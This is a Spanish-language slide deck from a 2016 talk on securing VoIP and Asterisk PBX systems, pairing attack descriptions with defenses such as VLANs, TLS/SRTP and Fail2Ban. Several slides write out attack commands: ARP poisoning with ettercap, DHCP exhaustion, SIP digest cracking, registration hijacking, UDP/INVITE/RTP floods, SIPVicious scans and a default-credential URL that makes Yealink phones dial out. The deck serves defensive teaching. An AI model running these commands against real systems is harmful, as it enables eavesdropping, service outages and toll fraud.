SlideShare una empresa de Scribd logo

Seguridad en VOIP addons 2016

INTELIX INGENIERIA - Rosario Argentina
INTELIX INGENIERIA - Rosario Argentina

Conferencia de seguridad en VOIP version 2016 con algunos agregados respecto a la anterior del año pasado

Tecnología
1 de 39
Descargar para leer sin conexión
Página 112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en Comunicaciones Unificadas y GNU/Linux Disertante: Ing. Fernando M. Villares Rosario – CIE 2016
Página 212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre El puntapié inicial hacia una noción de seguridad. ¿Han sufrido o conocen sobre algún tipo de ataque a sistemas de comunicaciones? ¿Desde donde espero recibir un ataque? ¿Las comunicaciones son SEGURAS? ¿Es segura la telefonía tradicional? ¿Es seguro el universo de Internet? Análisis Inicial: ¿Sabemos algo? ¿Podemos hacer algo al respecto?
Página 312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre ¿Por donde es posible atacar un sistema de VoIP? Importante:Importante: No olvidar el poder de la ingenieríaNo olvidar el poder de la ingeniería Social sobre la CAPA 8 del modelo OSI (la BIOS).Social sobre la CAPA 8 del modelo OSI (la BIOS).
Página 412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en las terminales Ataques: – Fuzzing – Flood UDP y RTP – Fallas de Firmwares y Bugs – INVITE flood – Fallos de configuración – Servicios no desactivados
Página 512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Fuzzing Envío de paquetes malformados en busca de errores de programación o bugs. Desbordamientos de buffer, tamaño de variables, fallos de segmentación... Herramientas PROTOS SIP Fuzzer VoIPER SiVuS VOIPPACK SIPVICIOUS
Página 612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Flooding Técnica de Denegación de Servicio (DoS) por inundación. Si se envían miles de paquetes basura no podremos procesar los buenos. Recordemos: packet loss, latencia, jitter... Herramientas: Inviteflood Udpflood Rtpflood Sipsak Sipp
Página 712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Error de capa 8, Bestia ignorante operando Sistema Se utiliza un Teléfono Yealink T2xP con firmware anterior al x.61.23.11 (6/6/2012) y se ejecuta dentro de la misma red este comando desde cualquier navegador web: http://user:user@DIR-IP-TELEFONO/cgi- bin/ConfigManApp.com? Id=34&Command=1&Number=NUMERO-A- MARCAR&Account=0 Resultado:Si el teléfono nunca fue actualizado en sus firmwares o sigue teniendo el user y clave por default user/user, llamará automágicamente al Número del comando por la cuenta 0 la cual ya a su vez estará autenticada en nuestra PBX. Imaginar que puede suceder si además, no tenemos en la PBX un limitador de cantidad de llamadas simultáneas por línea....
Página 812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre In-Seguridad en terminales Consecuencias: – Pérdida del servicio. – Desconfiguración de los terminales. – Ejecución de exploits (softphones). ¿Cómo nos defendemos? – Separar la red en diferentes VLANS (voz y datos) – ¡Nada de softphones! – Usar SIP sobre TCP (TLS si es posible) – Actualizaciones de firmware. – Sistemas de mitigación de DoS.
Página 912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la red Ataques: – Flooding/Fuzzing – Man-In-The-Middle – Eavesdropping – Ataques a servicios: ● TFTP/FTP ● DHCP ● SSH ● Apache/PHP ● MySQL/PostGRE SQL
Página 1012/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la red – Routers / Firewalls Muchos routers poseen el protocolo uPnP, que abre puertos automágicamente. Los routers pueden tener vulnerabilidades o ser susceptibles de instalarles RootKits. Muchos proveedores de datos proveen sus propios routers/firewalls con SIP ALG el cual no puede ser desactivado o sin admin permitida Una config correcta es lo más importante!
Página 1112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Man In The Middle De los ataques más temidos (es el paso previo a otro ataque) Implica situarse en medio de la comunicación, siendo transparente. ¡Toda la información pasa por nosotros! ARP Spoofing para situarnos 'en medio' Ejemplo: #echo 1 > /proc/sys/net/ipv4/ip_forward #ettercap -o -T -P repoison_arp -M arp:remote / 192.168.1.21/ /192.168.1.251/
Página 1212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Eavesdropping (I) El ataque más temido/peligroso!! Una vez hecho el M.I.T.M., todo pasa por nosotros... – Podemos capturar señalización. – ¡Podemos capturar el stream de audio! La privacidad del usuario queda comprometida. Ejemplo: “Una vez que tenemos el MITM podemos usar Wireshark para capturar y analizar el tráfico.”
Página 1312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Eavesdropping (II)
Página 1412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Ataques a servicios Normalmente en una PBX Asterisk se utiliza: TFTP o FTP para aprovisionamiento de fonos. DHCP para obtener una IP. Email para el servicio de fax y Voicemail Si desenchufamos un teléfono y esnifeamos la red, podemos saber que archivo pide. ¡Y pedirlo nosotros, usando la herramienta TFTPTheft! Podemos agotar las direcciones DHCP, para que los fonos no tengan IP, no pudiendo funcionar. Puedo atacar el server de email via un exploit y lograr control del sistema o saturar sus recursos. Ejemplo de agotamiento de direcciones IP: #dhcpx -i eth0 -vv -D 192.168.1.254
Página 1512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la red (II) Consecuencias: – Privacidad al descubierto. – Interrupción del servicio. – Configuraciones, contraseñas... ¡al descubierto! ¿Cómo nos defendemos? – Separar la red en distintas VLAN (voz y datos desde los switches o routers) – Audio y signalling cifrado: SRTP, TLS – Sistemas de mitigación de DoS.
Página 1612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la PBX (II) Ataques:Ataques: –– Flooding.Flooding. –– Ataques de peticiones remotasAtaques de peticiones remotas.. –– Cracking deCracking de passwords.passwords. –– REGISTER hijacking.REGISTER hijacking. –– Exploits.Exploits. –– Errores deErrores de configuración.configuración. –– Implementadores de “garage”.Implementadores de “garage”. –– Ing. Social en Sistemas OOTBIng. Social en Sistemas OOTB..
Página 1712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Ataques de peticiones remotas de llamadas. Ataques de gran volumen realizados por bots o maquinas zombies, no se centran en realizar llamadas per se sino en establecer cargos de interconexión ya que los proveedores de telecomunicaciones entre ellos se cobran mínimos cargos de interconexión. Bannear rangos de IP no suele funcionar porque provienen de miles de IP diferentes y en zonas diferentes. Motivación: ganar dinero por cargos de conexión, si se establece la llamada o es a un número premium mucho mejor!!!
Página 1812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Ataques de peticiones remotas de llamadas: PASOS (1) Escaneo de IP y ports. (2) Probar a enviar una petición de llamada anónima a un número de teléfono de la red beneficiaria. (3) Búsqueda de una cuenta SIP vulnerable con la que registrarse. (4) Registro como softphone, llamadas a números donde se encuentra la red beneficiada, si el número no descuelga, algún intermedio descolgará y cobrará llamada internacional, esto no es legal, pero es tremendamente difícil de detectar y denunciar. (5) Se detecta número de canales salientes disponibles, para maximizar el número de llamadas por tiempo y minimizar el número de peticiones a realizar para evitar ser detectado.
Página 1912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Crackeando los passwords en el protocolo SIP Sistema de autenticación mediante HTTP- Digest (RFC2617): – Un usuario intenta registrarse y recibe un error 407 junto con el digest. – El usuario lo cifra con su información (realm, usuario,contraseña) y se lo envía de vuelta. – Si los datos son correctos el proxy podrá autenticarlo. ¡¡Este proceso se hace 'casi' con cada mensaje!! El algoritmo usado es md5, se puede romper. Se suelen usar contraseñas muy simples...
Página 2012/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Crackeando los passwords en el protocolo SIP (II) Para romper el cifrado necesitamos capturar los paquetes que viajan en ambos sentidos en el momento de la autenticación mediante HTTP-Digest. Man In The Middle (M.I.T.M.) Herramientas: SIPCcrack, SIPDdump, John The Ripper, Cain & Abel Ejemplo (usando sipdump y sipcrack): #sipdump -i eth0 logins.pcap seq -w 1 9999 | ./sipcrack -s logins.pcap
Página 2112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Register Hijacking Cuando nos registramos con el proxy este guarda nuestra información (Contact) Si tenemos la clave, podemos crear un registro falso. Asterisk solo soporta 1 ubicación :( También podemos des-registrar un usuario, y dejará de recibir llamadas (aunque sí pueda hacerlas). Ejemplo: #reghijacker eth0 192.168.1.21 192.168.1.21 hacker@66.66.66.66 res -u 200 -p 1234
Página 2212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Exploits Errores en la programación que pueden llevar a desbordamientos de buffer, escritura en memoria inválida, fallos de segmentación... Ciertos invites malformados en asterisk 1.8 causaban deadlocks, 1.4.0 daba un core dump con content-lenght<0. El Xlite 1103 al enviarle un INVITE con el 'Content-Length' >= 1073741823 se pone a consumir RAM y decae el rendimiento del sistema. Asterisk es Software Libre, mucha gente lo estudia y por tanto sus fallos se corrigen muy pronto. Pero, ¿Qué pasa con las BlackBox privativas? Eolos, Cisco, Avaya, 3Cx, Denwa, M$ Lync (LoL) etc.
Página 2312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Errores en las configuraciones (siempre Capa 8) allowguest=no ; permite o rechaza las comunicaciones de invitados (por defecto es yes) Contextos y permisos adecuados al nivel de privilegios del usuario. T: Permite que el usuario llamado transfiera una llamada marcando las teclas de transferencia ciega de features.conf. No limitar o controlar el número máximo de llamadas por usuario o troncal de la PBX. IN-seguridad en los canales de conferencias remotos y DISA (vieron MR ROBOT, temporada 2?)
Página 2412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en la PBX (II) Consecuencias: – Interrupción TOTAL o parcial del servicio. – Toll fraud / Fraude de llamadas. – 'Robo' de llamadas. – Escuchas INDEBIDAS. ¿Cómo nos defendemos? – Señalización cifrada. – SIP sobre TCP/TLS. – Activar solo los servicios necesarios. – Firewalls/sistemas de mitigación de DoS. – Segurizar y verificar las configuraciones.
Página 2512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Otros aspectos de seguridad Si hemos conseguido la clave del usuario podemos hacer de todo: – Transferirle llamadas – Colgarle llamadas – Otras posibles molestias...xD... SPAM en VoIP...SPIT – Hola amigo! Desea ser tan feliz como yo? Pues ya puede serlo enviando 1 dólar a Hombre feliz al 742 de Avenida Siempre Viva, no lo dude la felicidad eterna esta a solo un dólar! – Homero J. Simpson
Página 2612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Algunas Herramientas... Sipsak y SIPP son Herramientas estándar para bench- marking y testing de SIP, también las podemos usar para hacer flooding :-) Uso: #sipsak -F -s sip:intelix@172.16.20.100 #sipp 172.16.20.100 (pulsar ++++) Flooding (enviamos 1.000.000 de paquetes): #udpflood 192.168.1.3 192.168.1.251 9 5060 1000000 #inviteflood br0 200 192.168.21 192.168.1.251 1000000 #rtpflood 192.168.1.3 192.168.1.251 9 16384 1000000 15000 2000 1886986910 Cain & Abel: Herramienta completa de cracking con funcionalidades de VoIP. ARP Poisoning con 1 click ¡Eavesdropping con cualquier codec!
Página 2712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Algunas Herramientas (II)... SiVuS: Herramienta de auditoría, seguridad y generación de tráfico SIP, permite testear dispositivos SIP en busca de vulnerabilidades. SipVicious, Conjunto de herramientas de seguridad en VoIP: Svmap (escaneador SIP) Svcrack (crackeador de contraseñas) Svwar (enumerador de extensiones) Uso: svmap.py 192.168.1.1-254 svwar.py -e200-299 192.168.1.111 svcrack.py -u200 dict.dat 192.168.1.111
Página 2812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Algunas Herramientas (III)... Voiper: Potente fuzzer con muchos casos de prueba Se usa en como herramienta de testing para detectar fallos en software y hardware. Uso: #python fuzzer.py -f SIPInviteCommonFuzzer -i 192.168.3.101 -p 5060 -a sessions/scen1 -c 0 #python fuzzer.py -f SIPInviteCommonFuzzer -c 2 -i 192.168.3.101 -p 5060 -a sessions/scen2 -m 1024 #python torturer.py -i 192.168.1.2 -p 5060 -c 0 -t invalid
Página 2912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Análisis final de Seguridad en Comunicaciones IP... En el mundo del SIP sobre UDP y el RTP la VoIP es INSEGURA y punto. Pero, es necesario cierto acceso a la red para poder comprometer la seguridad. Entonces segurizar hoy es no lamentar mañana, por ejemplo por medio de: – Túneles VPN para enlaces a través de Internet. – Distintas VLAN para voz y datos. – Contraseñas robustas, SIP TLS, SRTP. – Servicios más seguros, DHCP por MAC, 802.1x, Switches Layer 2/3. – Firewalls y Sistemas de IDS/IPS.
Página 3012/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Seguridad en comunicaciones VoIP con Asterisk Asterisk en sus ramas desde la 1.8, hasta la actualAsterisk en sus ramas desde la 1.8, hasta la actual 14, soporta cifrado de medios y seguridad en canales14, soporta cifrado de medios y seguridad en canales SIP a través del protocolo SRTP para el sonido y deSIP a través del protocolo SRTP para el sonido y de SIP sobre TLS para la señalización.SIP sobre TLS para la señalización. Asterisk soporta certificados de firma digital, yAsterisk soporta certificados de firma digital, y cifrado AES-128 en su protocolo nativocifrado AES-128 en su protocolo nativo IAX2IAX2 lo cual lolo cual lo convierte en una opción muy atractiva para mantenerconvierte en una opción muy atractiva para mantener la privacidad de la información que circula desde yla privacidad de la información que circula desde y hacia el servidor.hacia el servidor. Se debe tener muchísimo cuidado al segurizar losSe debe tener muchísimo cuidado al segurizar los servidores a usar, ya sea por medio de firewalls deservidores a usar, ya sea por medio de firewalls de filtrado de paquetes, medios seguros de control defiltrado de paquetes, medios seguros de control de acceso y sistemas de auditoría. Por ejemplo:acceso y sistemas de auditoría. Por ejemplo: Fail2BanFail2Ban
Página 3112/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Generación de certificados para uso en TLS con asterisk:Generación de certificados para uso en TLS con asterisk: Asterisk posee su propio script para generar certificados digitales…Asterisk posee su propio script para generar certificados digitales… Generación de CA y certificado de servidor:Generación de CA y certificado de servidor: #./ast_tls_cert -C 192.168.2.100 -O "INTELIX" -d /etc/asterisk/keys#./ast_tls_cert -C 192.168.2.100 -O "INTELIX" -d /etc/asterisk/keys Generación de certificados de clientes:Generación de certificados de clientes: #./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k#./ast_tls_cert -m client -c /etc/asterisk/keys/ca.crt -k /etc/asterisk/keys/ca.key -C 192.168.2.1 -O "INTELIX" -d/etc/asterisk/keys/ca.key -C 192.168.2.1 -O "INTELIX" -d /etc/asterisk/keys -o yealink1/etc/asterisk/keys -o yealink1 Cada certificado tiene validez de 1 año y llaves de 4096 bits.Cada certificado tiene validez de 1 año y llaves de 4096 bits. TLS y SRTP en Asterisk
Página 3212/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre Configuración de TLS en Asterisk 11 y + (sip.conf):Configuración de TLS en Asterisk 11 y + (sip.conf): tlsenable=yestlsenable=yes tlsbindaddr=0.0.0.0:5061tlsbindaddr=0.0.0.0:5061 tlscertfile=/etc/asterisk/keys/asterisk.pemtlscertfile=/etc/asterisk/keys/asterisk.pem tlscafile=/etc/asterisk/keys/ca.crttlscafile=/etc/asterisk/keys/ca.crt tlscapath=/etc/asterisk/keystlscapath=/etc/asterisk/keys tlsdontverifyserver=notlsdontverifyserver=no tlsverifyclient=yestlsverifyclient=yes tlsignorecommonname=notlsignorecommonname=no tlscipher=ALLtlscipher=ALL tlsclientmethod=tlsv1tlsclientmethod=tlsv1 Configuración (sip.conf) en cada usuario:Configuración (sip.conf) en cada usuario: encryptionencryption=yes=yes transport=tlstransport=tls TLS y SRTP en Asterisk
Página 3312/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP BLINK SOFT PHONE PARA LINUX
Página 3412/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP BLINK SOFT PHONE PARA LINUX
Página 3512/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP YEALINK T46G
Página 3612/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP YEALINK T46G
Página 3712/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre TLS y SRTP YEALINK T46G
Página 3812/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre ►► Internet Engineering Task Force (Internet Engineering Task Force (www.ietf.orgwww.ietf.org)) RFC 2401-2764-2709-2411-2521-2685-2833RFC 2401-2764-2709-2411-2521-2685-2833 ►► Recursos VoIP – Web Page – (www.recursosvoip.com)Recursos VoIP – Web Page – (www.recursosvoip.com) ►► Cisco VoIP White Papers - www.cisco.comCisco VoIP White Papers - www.cisco.com ►► Voip-Info Web Page – www.voip-info.orgVoip-Info Web Page – www.voip-info.org ►► Digium Home Pages –Digium Home Pages – www.asterisk.orgwww.asterisk.org / www.digium.com/ www.digium.com ►► International Telecommunication Union WebPage - www.itu.intInternational Telecommunication Union WebPage - www.itu.int ►► Voip Novatos -Voip Novatos - www.voipnovatos.eswww.voipnovatos.es ►► FreePBX & TrixBox forums -FreePBX & TrixBox forums - www.trixbox.orgwww.trixbox.org / www.freepbx.org/ www.freepbx.org ►► Irontec Soluciones Linux para empresas -Irontec Soluciones Linux para empresas - www.irontec.comwww.irontec.com ►► Asterisk The definitive guide 3da. Edición. - McGraw Hill 2011Asterisk The definitive guide 3da. Edición. - McGraw Hill 2011 ►► Nerd Vittles Home Page - www.nerdvittles.comNerd Vittles Home Page - www.nerdvittles.com ►► Sinologic.net/Avanzada 7 – Elio Rojano -Sinologic.net/Avanzada 7 – Elio Rojano - www.sinologic.netwww.sinologic.net ►► Commlogik Corporation -Commlogik Corporation - www.commlogik.comwww.commlogik.com ►► Elastix PBX Forums -Elastix PBX Forums - www.elastix.orgwww.elastix.org ►► Polycom Reference Guides and manuals -Polycom Reference Guides and manuals - www.polycom.comwww.polycom.com ►► Asterisk Guru Home Page -Asterisk Guru Home Page - www.asteriskguru.comwww.asteriskguru.com ►► Asterisk Docs -Asterisk Docs - www.asteriskdocs.comwww.asteriskdocs.com ►► Seguridad en Voip -Seguridad en Voip - Saúl Ibarra Corretgé -Saúl Ibarra Corretgé - www.saghul.netwww.saghul.net ►► Asterisk MX Blog – Christian Cabrera – www.asteriskmx.comAsterisk MX Blog – Christian Cabrera – www.asteriskmx.com BIBLIOGRAFÍA CONSULTADA
Página 3912/09/2016 Seguridad en Comunicaciones Unificadas utilizando Software Libre LICENCIA DE ESTA PRESENTACIÓN Autor: Ing. Fernando M. Villares Terán 09/2016Autor: Ing. Fernando M. Villares Terán 09/2016 Bajo licencia Creative CommonsBajo licencia Creative Commons http://creativecommons.org/http://creativecommons.org/ Atribución-CompartirIgual 2.5 Argentina (CC BY-SA 2.5)Atribución-CompartirIgual 2.5 Argentina (CC BY-SA 2.5) Consultas: contacto@intelix.com.arConsultas: contacto@intelix.com.ar www.intelix.com.arwww.intelix.com.ar TODAS LAS MARCAS REGISTRADAS NOMBRADAS O UTILIZADASTODAS LAS MARCAS REGISTRADAS NOMBRADAS O UTILIZADAS EN ESTA PRESENTACIÓN SON PROPIEDAD DE SUS RESPECTIVOSEN ESTA PRESENTACIÓN SON PROPIEDAD DE SUS RESPECTIVOS DUEÑOS Y NO DEBEN SER USADAS SIN LA CORRESPONDIENTEDUEÑOS Y NO DEBEN SER USADAS SIN LA CORRESPONDIENTE AUTORIZACIÓN DE LOS MISMOS.AUTORIZACIÓN DE LOS MISMOS.

Recomendados

Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
TR Hirecom
 
When mobile phone (not) meets privacy More than apps & OS
When mobile phone (not) meets privacy More than apps & OSWhen mobile phone (not) meets privacy More than apps & OS
When mobile phone (not) meets privacy More than apps & OS
Alfonso Muñoz, PhD
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
Jaime Sánchez
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
Alexander Velasque Rimac
 
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppPlataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Jaime Sánchez
 
Hacking voip LimaHack 2011
Hacking voip LimaHack 2011Hacking voip LimaHack 2011
Hacking voip LimaHack 2011
Juan Oliva
 
Ataques de suplantación de identidad
Ataques de suplantación de identidadAtaques de suplantación de identidad
Ataques de suplantación de identidad
RenataDG05
 
Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014
Jaime Sánchez
 

Recomendados

Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
Ethical hacking en Plataformas de Voz Sobre IP (Elastix)
TR Hirecom
 
When mobile phone (not) meets privacy More than apps & OS
When mobile phone (not) meets privacy More than apps & OSWhen mobile phone (not) meets privacy More than apps & OS
When mobile phone (not) meets privacy More than apps & OS
Alfonso Muñoz, PhD
 
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
(In)Seguridad y Ataques de Mensajería Instantánea en Entornos Corporativos - ...
Jaime Sánchez
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
Alexander Velasque Rimac
 
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppPlataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Jaime Sánchez
 
Hacking voip LimaHack 2011
Hacking voip LimaHack 2011Hacking voip LimaHack 2011
Hacking voip LimaHack 2011
Juan Oliva
 
Ataques de suplantación de identidad
Ataques de suplantación de identidadAtaques de suplantación de identidad
Ataques de suplantación de identidad
RenataDG05
 
Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014
Jaime Sánchez
 
Seguridad de redes (congreso)
Seguridad de redes (congreso)Seguridad de redes (congreso)
Seguridad de redes (congreso)
Nbsecurity
 
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
RootedCON
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de Servicio
Alan Resendiz
 
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
RootedCON
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of Privacy
Jaime Sánchez
 
Ataques Informáticos
Ataques InformáticosAtaques Informáticos
Ataques Informáticos
Jose Manuel Acosta
 
Seguridad en VoIP
Seguridad en VoIPSeguridad en VoIP
Seguridad en VoIP
aitelpucp
 
Amenazas avanzadas persistentes
Amenazas avanzadas persistentesAmenazas avanzadas persistentes
Amenazas avanzadas persistentes
Secpro - Security Professionals
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativos
Tensor
 
Ey ciber seg uah 2016 freewifi
Ey ciber seg uah 2016 freewifiEy ciber seg uah 2016 freewifi
Ey ciber seg uah 2016 freewifi
Wiktor Nykiel ✔
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativos
Tensor
 
Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)Taller de Hacking (EXIT 2014)
Taller de Hacking (EXIT 2014)
Mackaber Witckin
 
Ignorancia inalámbrica
Ignorancia inalámbricaIgnorancia inalámbrica
Ignorancia inalámbrica
Sergiu Mesesan
 
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
Securización de sistemas de VoIP - JOSÉ LUIS VERDEGUER - VoIP2DAY 2017
VOIP2DAY
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)
Corp. Weapon's
 
Se siente usted seguro con sus dispositivos móviles
Se siente usted seguro con sus dispositivos móvilesSe siente usted seguro con sus dispositivos móviles
Se siente usted seguro con sus dispositivos móviles
Secpro - Security Professionals
 
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
Manual de pentesting_sobre_ataque_a_encirptado_wep_con_backtrack_5
White Hat Mexico
 
Ataques spoofing y botnet
Ataques spoofing y botnetAtaques spoofing y botnet
Ataques spoofing y botnet
Adolfo Azpeitia Escalera
 
Nuevas modalidades de fraude atm
Nuevas modalidades de fraude atmNuevas modalidades de fraude atm
Nuevas modalidades de fraude atm
Secpro - Security Professionals
 
Defeating whats app’s lack of privacy
Defeating whats app’s lack of privacyDefeating whats app’s lack of privacy
Defeating whats app’s lack of privacy
jeysonh
 
Foca
FocaFoca
Foca
Children International
 
Seguridad en VoIP
Seguridad en VoIPSeguridad en VoIP
Seguridad en VoIP
Pablo Garaizar
 

Más contenido relacionado

La actualidad más candente

Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
RootedCON
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de Servicio
Alan Resendiz
 
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
RootedCON
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of Privacy
Jaime Sánchez
 
Defeating whats app’s lack of privacy
Defeating whats app’s lack of privacyDefeating whats app’s lack of privacy
Defeating whats app’s lack of privacy
jeysonh
 

La actualidad más candente (20)

Seguridad de redes (congreso)
Seguridad de redes (congreso)Seguridad de redes (congreso)
Seguridad de redes (congreso)
 
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
Alfonso Muñoz & Jorge Cuadrado - Phreaking is alive! Abusing GSM: Covert chan...
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de Servicio
 
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of Privacy
 
Ataques Informáticos
Ataques InformáticosAtaques Informáticos
Ataques Informáticos
 
Seguridad en VoIP
Seguridad en VoIPSeguridad en VoIP
Seguridad en VoIP
 
Amenazas avanzadas persistentes
Amenazas avanzadas persistentesAmenazas avanzadas persistentes
Amenazas avanzadas persistentes
 
Seguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativosSeguridad y ataques de im en entornos corporativos
Seguridad y ataques de im en entornos corporativos
 
Ey ciber seg uah 2016 freewifi
Ey ciber seg uah 2016 freewifiEy ciber seg uah 2016 freewifi
Ey ciber seg uah 2016 freewifi
 
Seguridad y ataques de im en entornos corporativos
